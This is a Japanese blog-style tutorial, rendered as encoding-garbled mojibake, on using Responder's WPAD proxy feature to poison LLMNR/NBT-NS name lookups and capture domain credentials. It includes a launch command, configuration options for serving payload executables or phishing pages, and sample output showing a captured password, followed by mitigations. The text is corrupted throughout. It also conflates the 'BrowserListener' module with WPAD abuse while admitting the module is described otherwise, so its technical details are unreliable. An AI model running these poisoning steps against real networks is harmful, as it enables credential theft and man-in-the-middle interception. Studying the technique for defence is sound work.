ã¯ããã«
Responder ã¯ããããã¯ãŒã¯ãããã¬ãŒã·ã§ã³ãã¹ããã»ãã¥ãªãã£è©äŸ¡ã«ãããŠåºãå©çšãããŠãã匷åãªããŒã«ã§ãã䞻㫠LLMNR (Link-Local Multicast Name Resolution)ãNBT-NS (NetBIOS Name Service)ãMDNS (Multicast DNS) ã®ãã€ãºãã³ã°æ»æãéããŠããããã¯ãŒã¯äžã®èªèšŒæ å ±ïŒç¹ã« NTLM ããã·ã¥ïŒãçªåããããšãç®çãšããŠããŸãã
Responder ã¯å€æ©èœã§ãããHTTP/SMB/MSSQL/FTP/LDAP ãªã©ã®åœã®èªèšŒãµãŒããŒãèµ·åããæ©èœãæã£ãŠããŸããããã«ãããã¯ã©ã€ã¢ã³ãã誀ã£ãŠãããã®åœãµãŒããŒã«æ¥ç¶ããããšããéã«ãèªèšŒæ å ±ãååŸã§ããŸãã
ãã®èšäºã§ã¯ãResponder ã®æ°ããæ©èœã®äžã§ããç¹ã« BrowserListener
ã¢ãžã¥ãŒã«ã«çŠç¹ãåœãŠãŠè§£èª¬ããŸããBrowserListener ã¯ã䞻㫠Web ãã©ãŠã¶ã®ãã©ãã£ãã¯ãã¿ãŒã²ãããšããç¹ã« WPAD (Web Proxy Auto-Discovery Protocol) ãæªçšããŠãããã·èšå®ãä¹ã£åãããã©ãŠã¶çµç±ã§ã®èªèšŒæ
å ±ãååŸããããšããŸãããã®æ©èœã¯ãç¹ã«äŒæ¥ãããã¯ãŒã¯ç°å¢ãªã©ããããã·ãå©çšãããŠããç°å¢ã§å¹æãçºæ®ããããšããããŸãã
ãã®èšäºãéããŠãResponder ã® BrowserListener ãã©ã®ããã«åäœããã©ã®ããã«å©çšã§ããã®ãããããŠããã«å¯Ÿããé²åŸ¡çã«ã€ããŠç解ãæ·±ããŠãããŸããããðª
Responder ãš BrowserListener ã®æŠèŠ
Responder ã¯ãLaurent Gaffie ã«ãã£ãŠéçºããããªãŒãã³ãœãŒã¹ã®ããŒã«ã§ã䞻㫠Windows ãããã¯ãŒã¯ç°å¢ã«ãããåå解決ãããã³ã«ã®è匱æ§ãçªãããšã§ç¥ãããŠããŸããå ·äœçã«ã¯ãDNS ãµãŒããŒãå¿çããªãããããã¯èšå®ãããŠããªãå Žåã«ãã©ãŒã«ããã¯ãšããŠäœ¿çšããã LLMNR ã NBT-NS ãšãã£ããããã³ã«ã«å¯ŸããŠåœã®å¿çãéä¿¡ããŸãïŒãã€ãºãã³ã°ïŒãããã«ãããæ¬æ¥æ¥ç¶ãã¹ããµãŒããŒã®ä»£ããã«æ»æè ã®ãã·ã³ã«æ¥ç¶ãããèªèšŒæ å ±ãçªåããŸãã
Responder ã¯ã以äžã®ãããªæ§ã ãªåœã®ãµãŒããŒæ©èœãæäŸããŸã:
- HTTP/HTTPS ãµãŒããŒ
- SMB ãµãŒããŒ
- MSSQL ãµãŒããŒ
- FTP ãµãŒããŒ
- LDAP ãµãŒããŒ
- DNS ãµãŒããŒ
- WPAD ãããã·ãµãŒããŒ
- ãã®ä» (POP3, IMAP, SMTP ãªã©)
BrowserListener
ã¢ãžã¥ãŒã«ã¯ããããã®æ©èœã®äžéšãç¹ã« WPAD ãããã·ãµãŒããŒæ©èœãšå¯æ¥ã«é¢é£ããŠããŸãããã®ã¢ãžã¥ãŒã«ã®äž»ãªç®çã¯ããããã¯ãŒã¯äžã®ãã¡ã€ã³ã³ã³ãããŒã©ãŒïŒPDC – Primary Domain ControllerïŒããã¹ãã«ã¹ã¢ãŒããã§çºèŠããããšã«ãããšèª¬æãããŠããŸãããå®éã«ã¯ WPAD ã®æªçšã«é¢é£ããåäœãæ
ã£ãŠãããšèããããŸãã
WPAD ã¯ãã¯ã©ã€ã¢ã³ãïŒç¹ã« Internet Explorer ãªã©ã® Web ãã©ãŠã¶ïŒããããã¯ãŒã¯äžã®ãããã·èšå®ãèªåçã«æ€åºããããã®ãããã³ã«ã§ããã¯ã©ã€ã¢ã³ãã¯éåžžãDHCP ãŸã㯠DNS ãéã㊠`wpad.dat` ãšããèšå®ãã¡ã€ã«ïŒPAC – Proxy Auto-Config ãã¡ã€ã«ïŒã®å ŽæãåãåãããŸããæ»æè 㯠Responder ã䜿çšããŠãã®åãåããã«å¿çããåœã® `wpad.dat` ãã¡ã€ã«ãæäŸããŸãããã®åœãã¡ã€ã«ã¯ããã©ãŠã¶ã®ãã©ãã£ãã¯ãæ»æè ã®ãã·ã³ïŒResponder ãåäœããŠãããã·ã³ïŒãçµç±ããããã«æ瀺ããŸãã
ãã©ãŠã¶ãæ»æè ã®ãããã·ãµãŒããŒãçµç±ããŠéä¿¡ããããšãããšãResponder ã¯ãããã·èªèšŒãèŠæ±ããããšãã§ããŸãããŠãŒã¶ãŒãæ°ä»ããã«ïŒãããã¯éšãããŠïŒãã¡ã€ã³ã®èªèšŒæ å ±ãå ¥åãããšãResponder ã¯ããããã£ããã£ããŸããããã WPAD ãæªçšããäžéè æ»æ (MITM) ã®åºæ¬çãªæµãã§ãã
BrowserListener (WPAD ãããã·æ©èœ) ã®ä»çµã¿
Responder ã WPAD ãããã·ãšããŠæ©èœããèªèšŒæ å ±ãååŸããããã»ã¹ã¯ãããã€ãã®ã¹ãããã«åããããŸãã
- WPAD èŠæ±ã®åŸ æ©: ã¯ã©ã€ã¢ã³ããã·ã³ïŒç¹ã« WindowsïŒã®ãã©ãŠã¶ãããããã·èšå®ãèªåçã«æ€åºãããããã«æ§æãããŠããå Žåããããã¯ãŒã¯ã«æ¥ç¶ããéãªã©ã« WPAD èšå®ãã¡ã€ã«ã®å ŽæãåãåãããŸããããã¯éåžžãDNS 㧠`wpad.domain.com` ã®ãããªåå解決ãè©Šã¿ãããDHCP ãªãã·ã§ã³ 252 ãéããŠè¡ãããŸãã
- åå解決ã®ãã€ãºãã³ã°: å€ãã®çµç¹ã§ã¯ `wpad.domain.com` ãšãã DNS ã¬ã³ãŒããååšããŸãããDNS ã§è§£æ±ºã§ããªãã£ãå ŽåãWindows 㯠LLMNR ã NBT-NS ã䜿ã£ãŠããŒã«ã«ãããã¯ãŒã¯ã« `WPAD` ãšããååã®ãã¹ããæ¢ãåãåããããããŒããã£ã¹ã/ãã«ããã£ã¹ãããŸããResponder ã¯ãããã®åãåããããªãã¹ã³ããŠãããæ£èŠã®ãµãŒããŒãããæ©ããèªåã WPAD ãµãŒããŒã ããšå¿çããŸãïŒã¬ãŒã¹ã³ã³ãã£ã·ã§ã³ãå©çšïŒã
- åœ PAC ãã¡ã€ã«ã®æäŸ: ã¯ã©ã€ã¢ã³ãã¯ãResponder ãæå®ããåœã® WPAD ãµãŒããŒïŒã€ãŸã Responder èªèº«ïŒã«å¯Ÿã㊠`wpad.dat` ãã¡ã€ã«ãèŠæ±ããŸããResponder ã¯ããããããçšæãããããããã¯èšå®ãã¡ã€ã« (`Responder.conf`) ã§ã«ã¹ã¿ãã€ãºããã PAC ãã¡ã€ã«ãã¯ã©ã€ã¢ã³ãã«éä¿¡ããŸãã
- ãããã·èšå®ã®é©çš: ã¯ã©ã€ã¢ã³ãã®ãã©ãŠã¶ã¯åãåã£ã PAC ãã¡ã€ã«ãå®è¡ãããã®æ瀺ã«åŸã£ãŠãããã·ãµãŒããŒãèšå®ããŸãããã® PAC ãã¡ã€ã«ã¯ãç¹å®ã® URLïŒããŒã«ã«ãã¹ããªã©ïŒãé€ãã»ãšãã©ã® Web ãã©ãã£ãã¯ããResponder ãåäœããŠããæ»æè ã®ãã·ã³ã®ç¹å®ã®ããŒãïŒããã©ã«ãã§ã¯ 3141 ã 3128ïŒã«åããããã«èšè¿°ãããŠããŸãã
- ãããã·èªèšŒã®èŠæ±ãšèªèšŒæ å ±ã®ãã£ããã£: ãã©ãŠã¶ã Responder ãããã·çµç±ã§ã€ã³ã¿ãŒãããã«ã¢ã¯ã»ã¹ããããšãããšãResponder ã¯ãããã·èªèšŒïŒé垞㯠Basic èªèšŒã NTLM èªèšŒïŒãèŠæ±ããå¿çãè¿ããŸããå€ãã®ãã©ãŠã¶ïŒç¹ã« Internet Explorer ã EdgeïŒã¯ããŠãŒã¶ãŒã«èªèšŒãã€ã¢ãã°ã衚瀺ããŸãããŠãŒã¶ãŒããã¡ã€ã³ã®ãŠãŒã¶ãŒåãšãã¹ã¯ãŒããå ¥åãããšããã®èªèšŒæ å ±ïŒBasic èªèšŒãªãå¹³æãNTLM ãªãããã·ã¥åœ¢åŒïŒã Responder ã«éä¿¡ããããã£ããã£ã»èšé²ãããŸãã
Responder ã¯ã-F
ãªãã·ã§ã³ã䜿çšããããšã§ã`wpad.dat` ãã¡ã€ã«ã®ååŸèªäœã«å¯ŸããŠã NTLM èªèšŒã匷å¶ããããšãã§ããŸããããã«ããããŠãŒã¶ãŒããã©ãŠã¶ã§ Web ãµã€ãã«ã¢ã¯ã»ã¹ããåã§ãã£ãŠããèªèšŒæ
å ±ãååŸã§ããå¯èœæ§ããããŸã (ãã ãããã®ãªãã·ã§ã³ã¯ããã©ã«ãã§ã¯ç¡å¹ã§ã)ã
Responder-BrowserListener ã®äœ¿ãæ¹
Responder ã䜿çšã㊠WPAD ãããã·æ»æãå®è¡ãããã©ãŠã¶çµç±ã®èªèšŒæ å ±ãååŸããåºæ¬çãªæé ã説æããŸããéåžžãKali Linux ãªã©ã®ãããã¬ãŒã·ã§ã³ãã¹ãçšãã£ã¹ããªãã¥ãŒã·ã§ã³ã«ã¯ Responder ããã¬ã€ã³ã¹ããŒã«ãããŠããŸããããã€ã³ã¹ããŒã«ãããŠããªãå Žåã¯ãGitHub ããã¯ããŒã³ããŠã»ããã¢ããã§ããŸãã
# GitHub ãã Responder ãã¯ããŒã³ããå Žå
git clone https://github.com/SpiderLabs/Responder.git
cd Responder
åºæ¬çãªèµ·åæ¹æ³
æãåºæ¬çãªèµ·åã³ãã³ãã¯ä»¥äžã®ããã«ãªããŸãã
sudo python Responder.py -I eth0 -w -b -v
åãªãã·ã§ã³ã®æå³ã¯ä»¥äžã®éãã§ãã
sudo
: Responder ã¯ãããã¯ãŒã¯ã€ã³ã¿ãŒãã§ãŒã¹ããªãã¹ã³ããç¹æš©ããŒãã䜿çšããããã管çè æš©éãå¿ èŠã§ããpython Responder.py
: Responder ã¹ã¯ãªãããå®è¡ããŸããç°å¢ã«ãã£ãŠã¯åã«responder
ã³ãã³ãã§å®è¡ã§ããå ŽåããããŸãã-I eth0
: ãªãã¹ã³ãããããã¯ãŒã¯ã€ã³ã¿ãŒãã§ãŒã¹ãæå®ããŸããeth0
ã¯ç°å¢ã«åãããŠé©åãªã€ã³ã¿ãŒãã§ãŒã¹åïŒäŸ:ens33
,wlan0
ãªã©ïŒã«å€æŽããŠãã ããã-w
: WPAD äžæ£ãããã·ãµãŒããŒãéå§ããŸããããã BrowserListener æ©èœã®æ žå¿éšåã§ãã-b
: HTTP Basic èªèšŒãèŠæ±ããŸããããã«ããããŠãŒã¶ãŒåãšãã¹ã¯ãŒããå¹³æã§ãã£ããã£ãããå¯èœæ§ããããŸããïŒNTLM èªèšŒãçãå Žåã¯ããã®ãªãã·ã§ã³ãä»ããªãããResponder.conf
ã§èšå®ããŸãïŒ-v
: 詳现ã¢ãŒã (Verbose) ã§å®è¡ããããå€ãã®æ å ±ã衚瀺ããŸãã
ãã®ã³ãã³ããå®è¡ãããšãResponder ã¯æå®ãããã€ã³ã¿ãŒãã§ãŒã¹ã§ LLMNR/NBT-NS ã®åãåãããš WPAD èŠæ±ãåŸ ã¡åããŸããã¯ã©ã€ã¢ã³ãã WPAD ã解決ããããšããResponder ãå¿çã«æåãããšãã¯ã©ã€ã¢ã³ãã®ãã©ãŠã¶ã¯ Responder ããããã·ãšããŠäœ¿çšãå§ããŸãããããŠããŠãŒã¶ãŒã Web ãµã€ãã«ã¢ã¯ã»ã¹ããããšããéã«èªèšŒããã³ããã衚瀺ãããå ¥åãããèªèšŒæ å ±ã Responder ã®ã³ã³ãœãŒã«ã«è¡šç€ºããããã°ãã¡ã€ã«ã«ãèšé²ãããŸãã
Responder.conf ã®èšå®
Responder ã®åäœã¯ Responder.conf
ãã¡ã€ã«ã§è©³çŽ°ã«ã«ã¹ã¿ãã€ãºã§ããŸããWPAD ãããã·ã«é¢é£ããäž»ãªèšå®é
ç®ã«ã¯ä»¥äžã®ãããªãã®ããããŸãã
èšå®é ç® | 説æ | ããã©ã«ãå€ (äŸ) |
---|---|---|
WPADProxyServer |
WPAD ãããã·ãµãŒããŒãæå¹ã«ãããã©ããã-w ãªãã·ã§ã³ã§äžæžãå¯èœã |
On / Off |
WPADResponsePort |
WPAD ãããã·ãµãŒããŒããªãã¹ã³ããããŒãã | 3128 |
WPADAuth |
WPAD ãããã·ã§èŠæ±ããèªèšŒã¿ã€ã (NTLM, Basic)ã-b ãªãã·ã§ã³ã§ Basic èªèšŒã匷å¶å¯èœã |
NTLM |
WPADConfigScript |
ã¯ã©ã€ã¢ã³ãã«æäŸãã PAC ã¹ã¯ãªããã®ãã³ãã¬ãŒããããã§ãããã·ãšããŠåäœãããµãŒããŒã®ã¢ãã¬ã¹ãããŒããæå®ããŸãã | (ã¹ã¯ãªããå 容) |
Serve-Html |
èªèšŒèŠæ±ã®ä»£ããã«ãã«ã¹ã¿ã HTML ããŒãžãæäŸãããã©ããã | Off |
HtmlFilename |
Serve-Html = On ã®å Žåã«æäŸãã HTML ãã¡ã€ã«åã |
payload.html |
Serve-Exe |
èªèšŒèŠæ±ã HTML ã®ä»£ããã«ãå®è¡å¯èœãã¡ã€ã«ãæäŸãããã©ãããïŒæªæã®ãããã¡ã€ã«ã®é åžã«äœ¿çšãããå¯èœæ§ããïŒ | Off |
ExeFilename |
Serve-Exe = On ã®å Žåã«æäŸããå®è¡å¯èœãã¡ã€ã«åã |
payload.exe |
äŸãã°ãã«ã¹ã¿ã ã® PAC ãã¡ã€ã«ã䜿çšãããå ŽåããèªèšŒããã³ããã®ä»£ããã«ç¹å®ã® HTML ããŒãžã衚瀺ããããå ŽåïŒãã£ãã·ã³ã°ç®çãªã©ïŒã¯ããã®èšå®ãã¡ã€ã«ãç·šéããŸãã
ãã®ä»ã®ãªãã·ã§ã³
-F
: WPAD (`wpad.dat`) ãã¡ã€ã«ã®ååŸèŠæ±ã«å¯Ÿã㊠NTLM èªèšŒã匷å¶ããŸããããã«ããããã©ãŠã¶ãå®éã« Web ã¢ã¯ã»ã¹ãè¡ãåã«èªèšŒæ å ±ïŒããã·ã¥ïŒãååŸã§ããå¯èœæ§ããããŸããããã©ã«ãã¯ç¡å¹ã§ãã-r
: Workstation Service (WKSSVC) ã® NBT-NS èŠæ±ã«ãå¿çããŸããããã©ã«ãã¯ãã¡ã€ã«ãµãŒããŒãµãŒãã¹ (FSRV) èŠæ±ã®ã¿ã«å¿çããŸãã--lm
: LM ããã·ã¥ã®ããŠã³ã°ã¬ãŒãã匷å¶ããŸã (å€ã Windows XP/2003 ãªã©ã察象)ãã»ãã¥ãªãã£ãåäžããçŸä»£ã®ç°å¢ã§ã¯ããŸãå¹æããªãããæšå¥šãããŸããã
å®è¡äŸãšåºå
Responder ãèµ·åãããšã以äžã®ãããªãã°ãã³ã³ãœãŒã«ã«åºåãããŸãã
$ sudo responder -I eth0 -wbv
__
.----.-----.-----.-----.-----.-----.--| |-----.----.
| _| -__|__ --| _ | __|-----| | | | _|
|__| |_____|_____| __|_____|__|__|__|__|__|__|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.1.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON] <-- WPAD ãããã·ãæå¹
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [ON] <-- Basic èªèšŒãæå¹
Force LM Downgrade [OFF]
Fingerprinting [OFF]
[+] Generic Options:
Responder NIC [eth0]
Responder IP [192.168.1.100] <-- æ»æè
ã®IP
Challenge [Random]
Don't Respond To Self [ON]
[+] Listening for events...
[+] verbose] WPADServer: Listening for WPAD connection on port 3128
...
[WPAD] [192.168.1.150] WPAD File request from: 192.168.1.150:51234 (User-Agent: ...)
[HTTP] Basic Client : 192.168.1.150
[HTTP] Basic Username : DOMAIN\User1
[HTTP] Basic Password : Password123 <-- èªèšŒæ
å ±ããã£ããã£ãããïŒ
äžèšã®äŸã§ã¯ãIP ã¢ãã¬ã¹ 192.168.1.150
ã®ã¯ã©ã€ã¢ã³ãã WPAD ãã¡ã€ã«ãèŠæ±ãããã®åŸ Basic èªèšŒã§ãŠãŒã¶ãŒå DOMAIN\User1
ãšãã¹ã¯ãŒã Password123
ãéä¿¡ããŠããããšãããããŸãã
ãã£ããã£ãããèªèšŒæ
å ±ã¯ãã³ã³ãœãŒã«ã«åºåãããã ãã§ãªããlogs/
ãã£ã¬ã¯ããªå
ã®ãã°ãã¡ã€ã«ïŒäŸ: Responder-Session.log
ãHTTP-NTLMv2-192.168.1.150.txt
ãªã©ïŒã SQLite ããŒã¿ããŒã¹ã«ãä¿åãããŸããNTLM ããã·ã¥ãååŸãããå Žåã¯ãHashcat ã John the Ripper ãªã©ã®ããŒã«ã䜿ã£ãŠãªãã©ã€ã³ã§ã®ãã¹ã¯ãŒãã¯ã©ããã³ã°ãè©Šã¿ãããšãã§ããŸãã
æ»æã®æªçšãšåœ±é¿
Responder ã«ãã WPAD ãããã·æ»æãæåãããšã以äžã®ãããªåœ±é¿ãèããããŸãã
- èªèšŒæ å ±ã®çªå: æãçŽæ¥çãªåœ±é¿ã¯ããŠãŒã¶ãŒã®ãã¡ã€ã³èªèšŒæ å ±ïŒãã¹ã¯ãŒããŸã㯠NTLM ããã·ã¥ïŒãæ»æè ã«æŒæŽ©ããããšã§ããããã«ãããæ»æè ã¯ãã®ãŠãŒã¶ãŒã«ãªãããŸããŠä»ã®ã·ã¹ãã ããªãœãŒã¹ã«ã¢ã¯ã»ã¹ã§ããå¯èœæ§ããããŸããç¹ã«ç®¡çè æš©éãæã€ã¢ã«ãŠã³ãã®èªèšŒæ å ±ãçªåãããå Žåã被害ã¯ç倧ã«ãªããŸãã
- äžéè æ»æ (MITM): æ»æè ã¯ãããã·ãšããŠåäœãããããæå·åãããŠããªã HTTP éä¿¡ã®å 容ãçèŽããããæ¹ãããããããããšãå¯èœã§ããHTTPS éä¿¡ããã¯ã©ã€ã¢ã³ãã蚌ææžã®ãšã©ãŒãç¡èŠããã°ã解èªãããå¯èœæ§ããããŸãïŒResponder ã¯èªå·±çœ²å蚌ææžã䜿çšããããïŒã
- ãã£ãã·ã³ã°ãšãã«ãŠã§ã¢é
åž:
Responder.conf
ã§èšå®ãå€æŽããããšã§ãæ£èŠã®èªèšŒããã³ããã®ä»£ããã«åœã®ãã°ã€ã³ããŒãžïŒãã£ãã·ã³ã°ãµã€ãïŒã衚瀺ãããããæªæã®ããå®è¡å¯èœãã¡ã€ã«ïŒãã«ãŠã§ã¢ïŒãããŠã³ããŒãããããããããšãå¯èœã§ãã - å éšãããã¯ãŒã¯æ å ±ã®æ¢çŽ¢: ãŠãŒã¶ãŒã®ãã©ãŠãžã³ã°å±¥æŽãã¢ã¯ã»ã¹å ãããå éšãããã¯ãŒã¯ã®ãµãŒããŒãã¢ããªã±ãŒã·ã§ã³ã«é¢ããæ å ±ãåéã§ããå ŽåããããŸãã
察çãšç·©åç
Responder ã«ãã WPAD æ»æããããã«é¡äŒŒãã LLMNR/NBT-NS ãã€ãºãã³ã°æ»æãããããã¯ãŒã¯ãä¿è·ããããã«ã¯ã以äžã®å¯Ÿçãæå¹ã§ãã
-
WPAD ã®ç¡å¹å:
- çµç¹å ã§ãããã·ã®èªåæ€åºæ©èœ (WPAD) ã䜿çšããŠããªãå Žåã¯ãã°ã«ãŒãããªã·ãŒ (GPO) ã䜿çšããŠã¯ã©ã€ã¢ã³ã PC ã®ãèšå®ãèªåçã«æ€åºããããªãã·ã§ã³ãç¡å¹ã«ããŸãã
- Windows ãµãŒãã¹ `WinHttpAutoProxySvc` (WinHTTP Web Proxy Auto-Discovery Service) ãç¡å¹åããããšãæå¹ã§ãã
-
LLMNR ãš NBT-NS ã®ç¡å¹å:
- çŸä»£ã®ãã¡ã€ã³ç°å¢ã§ã¯ DNS ãäž»èŠãªåå解決æ段ã§ãããLLMNR ã NBT-NS ã¯äžèŠãªå Žåãå€ãã§ããå¯èœã§ããã°ãã°ã«ãŒãããªã·ãŒã䜿çšããŠãããã®ã¬ã¬ã·ãŒãããã³ã«ãç¡å¹åããŸãã
-
DNS ã§ã® WPAD ã¬ã³ãŒãèšå® (WPAD ãå©çšããå Žå):
- WPAD ã legitimately 䜿çšããŠããå Žåã¯ãDNS ãµãŒããŒã« `wpad` ãšããååã®ãã¹ãã¬ã³ãŒããæ£ããç»é²ããæ£èŠã® PAC ãã¡ã€ã«ã®å Žæãæãããã«ããŸããããã«ãããã¯ã©ã€ã¢ã³ãã LLMNR/NBT-NS ã«ãã©ãŒã«ããã¯ããã®ãé²ããŸãã
- Windows Server 2008 以éã§ã¯ãDNS ã®ã°ããŒãã«ã¯ãšãªãããã¯ãªã¹ããã `wpad` ãåé€ããå¿ èŠãããå ŽåããããŸãã
- ãããã¯ãŒã¯ã»ã°ã¡ã³ããŒã·ã§ã³ãšãã¡ã€ã¢ãŠã©ãŒã«: é©åãªãããã¯ãŒã¯ã»ã°ã¡ã³ããŒã·ã§ã³ãè¡ããäžèŠãªãããŒããã£ã¹ã/ãã«ããã£ã¹ããã©ãã£ãã¯ãã»ã°ã¡ã³ããè¶ããªãããã«èšå®ããŸãã
- äŸµå ¥æ€ç¥/é²æ¢ã·ã¹ãã (IDS/IPS): Responder ã®ãããªããŒã«ã®æŽ»åïŒLLMNR/NBT-NS ãã€ãºãã³ã°è©Šè¡ãªã©ïŒãæ€ç¥ã»ãããã¯ã§ãã IDS/IPS ãœãªã¥ãŒã·ã§ã³ãå°å ¥ããŸãã
- 匷åãªãã¹ã¯ãŒãããªã·ãŒãšå€èŠçŽ èªèšŒ (MFA): äžãäž NTLM ããã·ã¥ãæŒæŽ©ããŠãããã¹ã¯ãŒãã¯ã©ããã³ã°ãå°é£ã«ããããã«ãè€éã§é·ããã¹ã¯ãŒãã®äœ¿çšã匷å¶ããŸãããŸããéèŠãªã·ã¹ãã ãžã®ã¢ã¯ã»ã¹ã«ã¯ MFA ãå°å ¥ããŸãã
- SMB 眲åã®æå¹å: SMB ãã©ãã£ãã¯ã«å¯Ÿãããªã¬ãŒæ»æãé²ãããã«ãSMB 眲åãæå¹åããŸã (ãã㯠NTLM ãªã¬ãŒæ»æãžã®å¯Ÿçã§ãããããã·ã¥ååŸèªäœãé²ããã®ã§ã¯ãããŸããããååŸãããããã·ã¥ã®æªçšãå¶éããŸã)ã
- ãšã³ããã€ã³ãã»ãã¥ãªãã£: ææ°ã®ãšã³ããã€ã³ãã»ãã¥ãªãã£ãœãªã¥ãŒã·ã§ã³ã¯ãResponder ã®ãããªããŒã«ã®åäœããããã«ãã£ãŠé åžãããå¯èœæ§ã®ãããã«ãŠã§ã¢ãæ€ç¥ã»ãããã¯ã§ããå ŽåããããŸãã
- ãŠãŒã¶ãŒæè²: äžå¯©ãªèªèšŒããã³ããã衚瀺ãããå Žåã«ãå®æã«èªèšŒæ å ±ãå ¥åããªããããŠãŒã¶ãŒã«æè²ããŸããç¹ã«ãé垞衚瀺ãããªãã¯ãã®å Žé¢ã§ã®ããã³ããã«ã¯æ³šæãå¿ èŠã§ãã
ãŸãšã
Responder ã® BrowserListener æ©èœ (䞻㫠WPAD ãããã·æ©èœ) ã¯ãç¹ã«èšå®ãäžååãªãããã¯ãŒã¯ç°å¢ã«ãããŠãWeb ãã©ãŠã¶ãçµç±ããŠãŠãŒã¶ãŒã®èªèšŒæ å ±ãçªåããããã®åŒ·åãªææ³ã§ããLLMNR/NBT-NS ãã€ãºãã³ã°ãš WPAD ãããã³ã«ã®æªçšãçµã¿åãããããšã§ãæ»æè ã¯äžéè æ»æãä»æããæ©å¯æ å ±ãå ¥æããå¯èœæ§ããããŸãã
ãã®è åšã«å¯Ÿæããããã«ã¯ãäžèŠãªã¬ã¬ã·ãŒãããã³ã« (LLMNR, NBT-NS) ãæ©èœ (WPAD) ã®ç¡å¹åãé©åãªãããã¯ãŒã¯èšå®ããããŠå€å±€çãªã»ãã¥ãªãã£å¯ŸçïŒåŒ·åãªèªèšŒããããã¯ãŒã¯ç£èŠããŠãŒã¶ãŒæè²ãªã©ïŒãè¬ããããšãäžå¯æ¬ ã§ãã
ã»ãã¥ãªãã£å°é家ã¯ãResponder ã®ãããªããŒã«ãç解ãããã®æ»æææ³ããã¹ãç°å¢ã§åçŸããããšã§ãèªçµç¹ã®ãããã¯ãŒã¯ã®åŒ±ç¹ãçºèŠããããå ç¢ãªé²åŸ¡çãæ§ç¯ããããšãã§ããŸãããã ãããã®å©çšã¯åžžã«å«ççãªç¯å²ã«çããæ³èŠå¶ãéµå®ããå¿ èŠããããŸããâ
åèæ å ±
- Responder GitHub Repository: https://github.com/SpiderLabs/Responder
- Trustwave Blog Post (Responder 2.0): https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/responder-2-0-owning-windows-networks-part-3/
- Qiita – Responderã§è¡ãLLMNR Poisoning: https://qiita.com/motoSuzuki/items/21f3ac87e1df09335850
- Microsoft Learn – æ¢åã®ãªã³ãã¬ãã¹ ãããã· ãµãŒããŒãšé£æºãã (WPAD 解説å«ã): https://learn.microsoft.com/ja-jp/entra/identity/app-proxy/application-proxy-configure-connectors-with-proxy-servers
- Japan Developer Support Internet Team Blog – WPAD ã«ã€ããŠ: https://jpdsi.github.io/blog/internet-explorer-microsoft-edge/wpad/
ã³ã¡ã³ã